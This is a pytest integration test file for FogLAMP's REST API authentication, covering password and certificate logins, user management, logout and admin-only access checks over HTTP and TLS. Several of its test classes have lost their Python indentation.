        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("DELETE", "/foglamp/admin/4/delete", headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': "User has been deleted successfully"} == jdoc

    def test_delete_user_with_certificate_token(self, foglamp_url):
        # Deletes 'admin2' (user id 6).
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("DELETE", "/foglamp/admin/6/delete", headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': "User has been deleted successfully"} == jdoc

    @pytest.mark.parametrize(("form_data", "expected_values"), [
        ({"username": "admin1", "password": "F0gl@mp!"}, ""),
        ({"username": "admin2", "password": "F0gl@mp!"}, "")
    ])
    def test_login_of_deleted_user(self, foglamp_url, form_data, expected_values):
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
        r = conn.getresponse()
        assert 404 == r.status
        assert "User does not exist" == r.reason

    def test_logout_all_with_password_token(self, foglamp_url):
        # Logs out every session of user id 1 (admin).
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", '/foglamp/1/logout', headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert jdoc['logout']

    def test_verify_logout(self, foglamp_url):
        # The token invalidated by the logout-all above must now be rejected.
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", '/foglamp/asset', headers={"authorization": PASSWORD_TOKEN})
        r = conn.getresponse()
        assert 401 == r.status

    def test_admin_actions_forbidden_for_regular_user_with_pwd_token(self, foglamp_url):
        """Test that regular user is not able to perform any actions that only an admin can"""
        # Login with regular user
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert not jdoc['admin']
        _token = jdoc["token"]
        # Create User
        conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
                                                                     "password": "User@123"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r
        # Reset User
        conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r
        # Delete User
        conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r

    def test_admin_actions_forbidden_for_regular_user_with_cert_token(self, foglamp_url):
        """Test that regular user is not able to perform any actions that only an admin can"""
        # Login with regular user
        conn = http.client.HTTPConnection(foglamp_url)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
            r = conn.getresponse()
            assert 200 == r.status
            r = r.read().decode()
            jdoc = json.loads(r)
            assert not jdoc['admin']
            _token = jdoc["token"]
        # Create User
        conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
                                                                     "password": "User@123"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r
        # Reset User
        conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r
        # Delete User
        conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r

    @pytest.mark.skip(reason="Currently this feature is not implemented.")
    def test_regular_user_access_to_admin_api_config(self, foglamp_url):
        pass
class TestAuthPasswordWithoutTLS:
def test_login_username_regular_user(self, reset_foglamp, change_to_auth_mandatory_password,
foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert not jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
def test_logout_me(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/logout', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_login_with_invalid_credentials_regular_user(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "Foglamp"}))
r = conn.getresponse()
assert 404 == r.status
assert "Username or Password do not match" == r.reason
def test_login_username_admin(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
def test_login_with_invalid_credentials_admin(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "FOGLAMP"}))
r = conn.getresponse()
assert 404 == r.status
assert "Username or Password do not match" == r.reason
def test_login_with_admin_certificate(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 400 == r.status
assert "Use a valid username and password to login." == r.reason
def test_ping_with_allow_ping_true(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 0 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ingest(self, foglamp_url, wait_time):
add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME, PASSWORD_TOKEN, wait_time, tls_enabled=False)
generate_json_for_fogbench(ASSET_NAME)
send_data_using_fogbench(wait_time)
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 10 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ping_with_allow_ping_false(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
_token = jdoc["token"]
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/category/rest_api', body=json.dumps({"allowPing": "false"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
assert 403 == r.status
assert "Forbidden" == r.reason
@pytest.mark.parametrize(("query", "expected_values"), [
('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
{'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
])
def test_get_users(self, foglamp_url, query, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
def test_get_roles(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", "/foglamp/user/role", headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
{'description': 'All CRUD operations and self profile management',
'id': 2, 'name': 'user'}]} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, {'user': {'userName': 'any1', 'userId': 3, 'roleId': 2},
'message': 'User has been created successfully'}),
({"username": "admin1", "password": "F0gl@mp!", "role_id": 1},
{'user': {'userName': 'admin1', 'userId': 4, 'roleId': 1},
'message': 'User has been created successfully'}),
])
def test_create_user(self, foglamp_url, form_data, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, 'Logged in successfully'),
({"username": "admin1", "password": "F0gl@mp!"}, 'Logged in successfully')
])
def test_login_of_newly_created_user(self, foglamp_url, form_data, expected_values):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc['message']
def test_update_password(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", "/foglamp/user/any1/password", body=json.dumps({"current_password": "User@123",
"new_password": "F0gl@mp1"}),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'Password has been updated successfully for user id:<3>'} == jdoc
def test_login_with_updated_password(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", body=json.dumps({"username": "any1", "password": "F0gl@mp1"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert 'Logged in successfully' == jdoc['message']
def test_reset_user(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", "/foglamp/admin/3/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!"}),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'User with id:<3> has been updated successfully'} == jdoc
def test_login_with_resetted_password(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", body=json.dumps({"username": "any1", "password": "F0gl@mp!"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert 'Logged in successfully' == jdoc['message']
def test_delete_user(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("DELETE", "/foglamp/admin/4/delete", headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': "User has been deleted successfully"} == jdoc
def test_login_of_deleted_user(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", body=json.dumps({"username": "admin1", "password": "F0gl@mp!"}))
r = conn.getresponse()
assert 404 == r.status
assert "User does not exist" == r.reason
def test_logout_all(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("PUT", '/foglamp/1/logout', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_verify_logout(self, foglamp_url):
conn = http.client.HTTPConnection(foglamp_url)
conn.request("GET", '/foglamp/asset', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 401 == r.status
def test_admin_actions_forbidden_for_regular_user(self, foglamp_url):
"""Test that regular user is not able to perform any actions that only an admin can"""
# Login with regular user
conn = http.client.HTTPConnection(foglamp_url)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert not jdoc['admin']
_token = jdoc["token"]
# Create User
conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
"password": "User@123"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Reset User
conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Delete User
conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
    @pytest.mark.skip(reason="Currently this feature is not implemented.")
    def test_regular_user_access_to_admin_api_config(self, foglamp_url):
        # Placeholder: should verify a regular user cannot read/write admin API
        # configuration once that restriction is implemented server-side.
        pass
class TestAuthCertificateWithoutTLS:
    """Certificate-based authentication tests against the plain-HTTP REST API.

    Tests are order-dependent: login tests populate the module-level
    CERT_TOKEN which later tests reuse, and user ids (3..4) assume the
    database state produced by earlier tests in the class.
    """

    def test_login_with_user_certificate(self, foglamp_url, reset_foglamp,
                                         change_to_auth_mandatory_certificate):
        """A non-admin user certificate logs in successfully and gets a non-admin token."""
        conn = http.client.HTTPConnection(foglamp_url)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
            r = conn.getresponse()
            assert 200 == r.status
            r = r.read().decode()
            jdoc = json.loads(r)
            assert "Logged in successfully" == jdoc['message']
            assert "token" in jdoc
            assert not jdoc['admin']

    def test_login_with_admin_certificate(self, foglamp_url):
        """The admin certificate logs in with admin rights; token is kept for later tests."""
        conn = http.client.HTTPConnection(foglamp_url)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
            r = conn.getresponse()
            assert 200 == r.status
            r = r.read().decode()
            jdoc = json.loads(r)
            assert "Logged in successfully" == jdoc['message']
            assert "token" in jdoc
            assert jdoc['admin']
            global CERT_TOKEN
            CERT_TOKEN = jdoc["token"]

    def test_login_with_custom_certificate(self, foglamp_url, remove_data_file):
        """A certificate signed by the FogLAMP CA (but not shipped with it) can log in."""
        # Create a custom certificate and sign it with the FogLAMP CA.
        # NOTE: check=True is required here — subprocess.run() does NOT raise
        # CalledProcessError unless asked to, so without it the except branch
        # below was dead code and a failed openssl invocation went unnoticed.
        try:
            subprocess.run(["openssl genrsa -out custom.key 1024 2> /dev/null"], shell=True, check=True)
            subprocess.run(["openssl req -new -key custom.key -out custom.csr -subj '/C=IN/CN=user' 2> /dev/null"],
                           shell=True, check=True)
            subprocess.run(["openssl x509 -req -days 1 -in custom.csr "
                            "-CA $FOGLAMP_ROOT/data/etc/certs/ca.cert -CAkey $FOGLAMP_ROOT/data/etc/certs/ca.key "
                            "-set_serial 01 -out custom.cert 2> /dev/null"], shell=True, check=True)
        except subprocess.CalledProcessError:
            assert False, " Certificate creation failed!"
        # Login with custom certificate
        conn = http.client.HTTPConnection(foglamp_url)
        cert_file_path = 'custom.cert'
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
            r = conn.getresponse()
            assert 200 == r.status
            r = r.read().decode()
            jdoc = json.loads(r)
            assert "Logged in successfully" == jdoc['message']
            assert "token" in jdoc
            assert not jdoc['admin']
        # Delete Certificates and keys created
        remove_data_file('custom.key')
        remove_data_file('custom.csr')
        remove_data_file('custom.cert')

    def test_login_with_invalid_credentials(self, foglamp_url, remove_data_file):
        """A file that is not a real certificate is rejected with 400."""
        # check=True for the same reason as in test_login_with_custom_certificate.
        try:
            subprocess.run(["echo 'Foglamp certificate' > template.cert"], shell=True, check=True)
        except subprocess.CalledProcessError:
            assert False, " Certificate creation failed!"
        # Login with custom certificate
        conn = http.client.HTTPConnection(foglamp_url)
        cert_file_path = 'template.cert'
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
            r = conn.getresponse()
            assert 400 == r.status
            assert 'Use a valid certificate to login.' == r.reason
        # Delete Certificates and keys created
        remove_data_file('template.cert')

    def test_login_username_admin(self, foglamp_url):
        """Password login is refused while certificate auth is mandatory."""
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
        r = conn.getresponse()
        assert 400 == r.status
        assert "Use a valid certificate to login." == r.reason

    def test_ping_with_allow_ping_true(self, foglamp_url):
        """Unauthenticated ping works while allowPing is true; no data ingested yet."""
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        jdoc = json.loads(r.read().decode())
        assert "dataRead" in jdoc
        assert 0 == jdoc['dataRead'], "data NOT seen in ping header"

    def test_ingest(self, foglamp_url, wait_time):
        """Data sent through an HTTP south service shows up in the ping counters."""
        add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME, CERT_TOKEN, wait_time, tls_enabled=False)
        generate_json_for_fogbench(ASSET_NAME)
        send_data_using_fogbench(wait_time)
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        jdoc = json.loads(r.read().decode())
        assert "dataRead" in jdoc
        assert 10 == jdoc['dataRead'], "data NOT seen in ping header"

    def test_ping_with_allow_ping_false(self, foglamp_url):
        """After disabling allowPing, unauthenticated ping is rejected with 403."""
        conn = http.client.HTTPConnection(foglamp_url)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
            r = conn.getresponse()
            assert 200 == r.status
            r = r.read().decode()
            jdoc = json.loads(r)
            assert "Logged in successfully" == jdoc['message']
            _token = jdoc["token"]
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"allowPing": "false"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 200 == r.status
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
        r = conn.getresponse()
        assert 200 == r.status
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/ping")
        r = conn.getresponse()
        assert 403 == r.status
        assert "Forbidden" == r.reason

    @pytest.mark.parametrize(("query", "expected_values"), [
        ('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
                        {'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
        ('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
        ('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
        ('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
    ])
    def test_get_users(self, foglamp_url, query, expected_values):
        """GET /foglamp/user (optionally filtered) works with a certificate token."""
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc

    def test_get_roles(self, foglamp_url):
        """GET /foglamp/user/role lists the built-in roles with a certificate token."""
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", "/foglamp/user/role", headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
                          {'description': 'All CRUD operations and self profile management',
                           'id': 2, 'name': 'user'}]} == jdoc

    @pytest.mark.parametrize(("form_data", "expected_values"), [
        ({"username": "any1", "password": "User@123"}, {'user': {'userName': 'any1', 'userId': 3, 'roleId': 2},
                                                        'message': 'User has been created successfully'}),
        ({"username": "admin1", "password": "F0gl@mp!", "role_id": 1},
         {'user': {'userName': 'admin1', 'userId': 4, 'roleId': 1},
          'message': 'User has been created successfully'}),
    ])
    def test_create_user(self, foglamp_url, form_data, expected_values):
        """POST /foglamp/admin/user creates users when authorized by certificate token."""
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
                     headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert expected_values == jdoc

    def test_update_password(self, foglamp_url):
        """PUT /foglamp/user/any1/password updates the password of user id 3."""
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", "/foglamp/user/any1/password", body=json.dumps({"current_password": "User@123",
                                                                            "new_password": "F0gl@mp1"}),
                     headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': 'Password has been updated successfully for user id:<3>'} == jdoc

    def test_reset_user(self, foglamp_url):
        """PUT /foglamp/admin/3/reset updates role and password of user id 3."""
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", "/foglamp/admin/3/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!"}),
                     headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': 'User with id:<3> has been updated successfully'} == jdoc

    def test_delete_user(self, foglamp_url):
        """DELETE /foglamp/admin/4/delete removes the admin1 user created earlier."""
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("DELETE", "/foglamp/admin/4/delete", headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert {'message': "User has been deleted successfully"} == jdoc

    def test_logout_all(self, foglamp_url):
        """PUT /foglamp/1/logout invalidates every session of user id 1."""
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("PUT", '/foglamp/1/logout', headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 200 == r.status
        r = r.read().decode()
        jdoc = json.loads(r)
        assert jdoc['logout']

    def test_verify_logout(self, foglamp_url):
        """After logout the certificate token is rejected with 401."""
        conn = http.client.HTTPConnection(foglamp_url)
        conn.request("GET", '/foglamp/asset', headers={"authorization": CERT_TOKEN})
        r = conn.getresponse()
        assert 401 == r.status

    def test_admin_actions_forbidden_for_regular_user(self, foglamp_url):
        """Test that regular user is not able to perform any actions that only an admin can"""
        # Login with regular user
        conn = http.client.HTTPConnection(foglamp_url)
        cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
        with open(cert_file_path, 'r') as f:
            conn.request("POST", "/foglamp/login", body=f)
            r = conn.getresponse()
            assert 200 == r.status
            r = r.read().decode()
            jdoc = json.loads(r)
            assert not jdoc['admin']
            _token = jdoc["token"]
        # Create User
        conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
                                                                     "password": "User@123"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r
        # Reset User
        conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
                     headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r
        # Delete User
        conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
        r = conn.getresponse()
        assert 403 == r.status
        r = r.read().decode()
        assert "403: Forbidden" == r

    @pytest.mark.skip(reason="Currently this feature is not implemented.")
    def test_regular_user_access_to_admin_api_config(self, foglamp_url):
        # Placeholder: should verify a regular user cannot touch admin API
        # configuration once that restriction is implemented server-side.
        pass
class TestTLSEnabled:
    """Sanity checks for the REST API served over TLS without authentication."""

    def test_on_default_port(self, reset_foglamp, enable_tls, foglamp_url, wait_time):
        """After enabling TLS, ping succeeds over HTTPS on the default port 1995."""
        enable_tls(foglamp_url, wait_time, auth=None)
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("GET", "/foglamp/ping")
        resp = conn.getresponse()
        payload = json.loads(resp.read().decode())
        assert "uptime" in payload
        assert payload['uptime'] > 0, "FogLAMP not up."

    def test_on_custom_port(self, wait_time):
        """Changing httpsPort to 2005 and restarting serves ping on the new port."""
        conn = http.client.HTTPSConnection("localhost", 1995, context=context)
        conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"httpsPort": "2005"}))
        resp = conn.getresponse()
        assert resp.status == 200
        payload = json.loads(resp.read().decode())
        assert "httpsPort" in payload
        assert payload['httpsPort']['value'] == '2005'
        # FIXME: Remove this wait time
        time.sleep(wait_time)
        conn.request("PUT", '/foglamp/restart', json.dumps({}))
        resp = conn.getresponse()
        assert resp.status == 200
        payload = json.loads(resp.read().decode())
        assert payload['message'] == "FogLAMP restart has been scheduled."
        time.sleep(wait_time * 2)
        conn = http.client.HTTPSConnection("localhost", 2005, context=context)
        conn.request("GET", "/foglamp/ping")
        resp = conn.getresponse()
        payload = json.loads(resp.read().decode())
        assert "uptime" in payload
        assert payload['uptime'] > 0, "FogLAMP not up."
class TestAuthAnyWithTLS:
def test_login_regular_user_using_password(self, reset_foglamp, change_to_auth_mandatory_any,
generate_password_based_auth_token, enable_tls,
foglamp_url, wait_time):
auth = 'password'
enable_tls(foglamp_url, wait_time, auth)
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert not jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
def test_logout_me_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/logout', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_login_with_invalid_credentials_regular_user_using_password(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "Foglamp"}))
r = conn.getresponse()
assert 404 == r.status
assert "Username or Password do not match" == r.reason
def test_login_username_admin_using_password(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
def test_login_with_invalid_credentials_admin_using_password(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "FOGLAMP"}))
r = conn.getresponse()
assert 404 == r.status
assert "Username or Password do not match" == r.reason
def test_login_with_user_certificate(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert not jdoc['admin']
def test_login_with_admin_certificate(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert jdoc['admin']
global CERT_TOKEN
CERT_TOKEN = jdoc["token"]
def test_login_with_custom_certificate(self, remove_data_file):
# Create a custom certificate and sign
try:
subprocess.run(["openssl genrsa -out custom.key 1024 2> /dev/null"], shell=True)
subprocess.run(["openssl req -new -key custom.key -out custom.csr -subj '/C=IN/CN=user' 2> /dev/null"],
shell=True)
subprocess.run(["openssl x509 -req -days 1 -in custom.csr "
"-CA $FOGLAMP_ROOT/data/etc/certs/ca.cert -CAkey $FOGLAMP_ROOT/data/etc/certs/ca.key "
"-set_serial 01 -out custom.cert 2> /dev/null"], shell=True)
except subprocess.CalledProcessError:
assert False, " Certificate creation failed!"
# Login with custom certificate
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = 'custom.cert'
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
